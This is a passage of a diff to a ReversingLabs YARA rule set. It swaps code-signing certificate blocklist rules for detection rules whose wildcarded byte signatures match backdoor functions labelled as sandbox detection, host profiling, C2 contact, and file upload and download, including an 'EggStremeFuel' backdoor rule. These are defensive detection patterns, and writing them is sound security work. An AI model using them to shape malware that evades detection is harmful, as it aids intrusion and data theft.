+            89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
+            48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ??
+            48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
+            48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89
+            C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D
+            45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$contact_c2_server = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ??
+            ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45
+            ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89
+            C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ??
+            48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8
+            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89
+            C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$parse_c2_response = {
+            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48
+            8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B
+            55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89
+            D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48
+            89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3
+        }
+		$download_file_from_c2_p1 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
+            ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48
+        }
+		$download_file_from_c2_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49
+            89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48
+            89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B
+            45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$reply_to_c2_server = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
+            ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89
+            D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89
+            C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
+            ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81
+            C4 ?? ?? ?? ?? 5B 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $anti_sandbox_detect_environment ) and ( $collect_host_information ) and ( $contact_c2_server ) and ( $parse_c2_response ) and ( all of ( $download_file_from_c2_p* ) ) and ( $reply_to_c2_server )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Eggstremefuel : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects EggStremeFuel backdoor."
 		author = "ReversingLabs"
-		id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ec9d0294-042c-513e-9b7e-1cb9ca812f09"
+		date = "2025-11-03"
+		modified = "2025-11-03"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5118-L5136"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.EggStremeFuel.yara#L1-L144"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0"
+		logic_hash = "c229cc4357353a8bc1305389e0b4146558ef449498eeb3a9dc118b82895d6e80"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "EggStremeFuel"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and ( pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures [ i ] . serial == "da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" ) and 1600244736 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "65297530-2482-5773-8914-461fb56cb41d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5138-L5156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$download_file_from_c2 = {
+            48 89 5C 24 ?? 55 56 57 48 8D AC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B
+            E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 0F 10 02 48 8D 44 24 ?? 48 8B
+            F9 0F 10 4A ?? B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 0F 11 00 0F 10 42 ?? 0F 11 48 ?? 0F
+            10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F 11 48 ?? 0F 10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F
+            11 48 ?? 0F 11 40 ?? 48 03 C1 0F 10 42 ?? 48 03 D1 48 8D 8D ?? ?? ?? ?? 0F 11 40 ??
+            0F 10 0A 0F 10 42 ?? 0F 11 08 0F 10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F 11 48 ?? 0F 10
+            4A ?? 33 D2 0F 11 40 ?? 0F 11 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C1 E8 ?? 85 C0
+            75 ?? 48 8D 44 24 ?? 49 83 C8 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 45 33 C9 48 8D 54 24
+            ?? E9 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 49 83 C8 ?? 49 FF C0
+            42 80 3C 00 ?? 75 ?? 41 B9 ?? ?? ?? ?? EB ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 8F ?? ?? ?? ?? 45 33 C9 FF 15
+            ?? ?? ?? ?? 44 8B 44 24 ?? 8B D8 41 3B C0 7D ?? 48 63 CB 48 8D 95 ?? ?? ?? ?? 48 03
+            D1 44 2B C3 48 8B 8F ?? ?? ?? ?? 45 33 C9 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 FF
+            15 ?? ?? ?? ?? 85 F6 7F ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 44 8B 44
+            24 ?? 03 DE 41 3B D8 7C ?? 44 89 44 24 ?? 48 8D 97 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C
+            8D 8D ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 95 ?? ?? ?? ?? 41
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
+        }
+		$upload_file_to_c2 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 55 57 41 56 48 8D AC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B 3D ??
+            ?? ?? ?? 45 8B F0 48 8B F2 48 8B 4F ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ??
+            ?? ?? 48 8B CE E8 ?? ?? ?? ?? 48 89 47 ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ??
+            33 D2 48 8D 4C 24 ?? 8B D8 44 8D 42 ?? E8 ?? ?? ?? ?? 44 8B C3 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 C8 ?? 48 FF C0 80 3C 01 ?? 75 ??
+            4C 8B C8 4C 8D 44 24 ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 C6 44 24 ?? ?? 33 D2 48
+            89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 4D ?? 66 89 44 24 ?? 88 44 24 ??
+            E8 ?? ?? ?? ?? 33 D2 48 8B CB 44 8D 42 ?? E8 ?? ?? ?? ?? 48 8B 4F ?? E8 ?? ?? ?? ??
+            44 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4F ?? 45 33 C0 41
+            8B D6 E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 C8 ?? 48 FF C0 80 3C 01 ?? 75 ?? 89 44 24
+            ?? 45 33 C9 48 8D 44 24 ?? 4C 8B C6 48 89 44 24 ?? 45 8D 71 ?? 41 8B D6 E8 ?? ?? ??
+            ?? EB ?? 4C 8B 4F ?? 48 8D 4D ?? BA ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? 48 8B D8 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 4C 8D 45 ?? 48 83 64 24 ?? ??
+            44 8B CB 41 8B D6 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 4F ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 4C 8B C6 41 8B D6 83 64 24 ?? ??
+            48 83 64 24 ?? ?? E8 ?? ?? ?? ?? 48 8B 4F ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 8B 8D
+            ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ??
+            49 8B E3 41 5E 5F 5D C3
+        }
+		$get_logical_drive_data_p1 = {
+            48 8B C4 55 57 41 54 41 56 41 57 48 8D A8 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 C7 44
+            24 ?? ?? ?? ?? ?? 48 89 58 ?? 48 89 70 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ??
+            ?? ?? ?? 48 8B F9 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 33 C0 48 89 45 ?? 88 45 ?? 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 63 D8 48 8B CB E8
+            ?? ?? ?? ?? 48 8B F0 48 8B D0 8B CB FF 15 ?? ?? ?? ?? 45 33 E4 41 BE ?? ?? ?? ?? 45
+            8B C6 33 D2 48 8D 4D ?? E8 ?? ?? ?? ?? 45 8B C6 33 D2 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B C3 99 83 E2 ?? 03 C2 C1 F8 ?? 85 C0 0F 8E ?? ?? ?? ?? 33 DB C6 44 24 ?? ??
+            4C 8B F6 44 8B F8 8A 04 33 88 44 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 80
+            7F ?? ?? 75 ?? 0F B7 44 24 ?? 66 89 47 ?? C6 47 ?? ?? C6 47 ?? ?? 48 8D 15 ?? ?? ??
+            ?? EB ?? 83 F8 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 44 0F BE 04 33 48 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 66 89 45 ?? 8A
+            45 ?? 88 45 ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 4C 8B 4C 24 ?? 49 C1 E9 ?? 4C 8B 44 24 ?? 49 C1 E8 ?? 48 8D 15 ??
+            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? 48 83 64 24 ?? ?? C6 44 24 ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 90 48 C7 45 ?? ?? ?? ?? ?? 48 83 65 ?? ?? C6 44 24 ?? ?? 48 8D 55 ?? 48 8D 4C
+        }
+		$get_logical_drive_data_p2 = {
+            24 ?? E8 ?? ?? ?? ?? 90 48 8D 4F ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 90
+            45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ??
+            ?? 33 D2 48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 C6 ?? 41 83 C4 ?? 48 83 C3 ?? 49 83 EF ??
+            0F 85 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 4F ?? E8 ?? ?? ?? ?? 90 48 83 78 ?? ?? 72 ??
+            48 8B 00 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33
+            C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 83 C9 ?? 49 FF C1 42
+            80 3C 08 ?? 75 ?? 83 64 24 ?? ?? 48 83 64 24 ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 4F ?? E8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ??
+            ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5C 5F
+            5D C3
+        }
+		$get_os_information_p1 = {
+            48 8B C4 55 41 54 41 56 48 8D A8 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85
+            ?? ?? ?? ?? 48 8B F1 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 7E ?? 48 8B CF E8 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 45 33 E4 44 89 64 24 ?? 48 8D 54 24 ?? 33 C9 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
+            E8 ?? ?? ?? ?? 48 8B D8 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 8D 54 24 ??
+            48 8B CB FF 15 ?? ?? ?? ?? 41 BE ?? ?? ?? ?? 45 8B C6 33 D2 48 8D 4D ?? E8 ?? ?? ??
+            ?? 44 89 74 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8D 4D ?? 4C 8B C3
+            48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 8D 74 24 ?? 4C 89 74 24
+            ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ??
+            90 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 90 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8B CF E8 ?? ?? ?? ?? 90 45 33 C0
+            B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ??
+            41 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D8 33 C0 48 89 03 48 89 43 ?? 48 8D 0D ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 11 8B 0A FF 15 ?? ?? ?? ?? 48 8B D0 45 8D 44
+        }
+		$get_os_information_p2 = {
+            24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8B
+            D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48
+            8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8D 44 24 ?? 48 8D 54 24 ?? 48
+            8B CF E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2
+            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 45 33 C0 48 8D 54 24 ?? 48 8B CE E8 ?? ?? ?? ?? 45
+            33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 48 8B CE E8 ?? ??
+            ?? ?? 48 8D 54 24 ?? 48 8B CE E8 ?? ?? ?? ?? 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 48 8D 54 24 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 83 78 ?? ?? 72 ?? 48 8B 00 4C 8B
+            C0 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D
+            4C 24 ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 83 C9 ?? 49 FF C1 46 38 24 08 75 ??
+            44 89 64 24 ?? 4C 89 64 24 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 41 5E 41 5C 5D C3
+        }
 
 	condition:
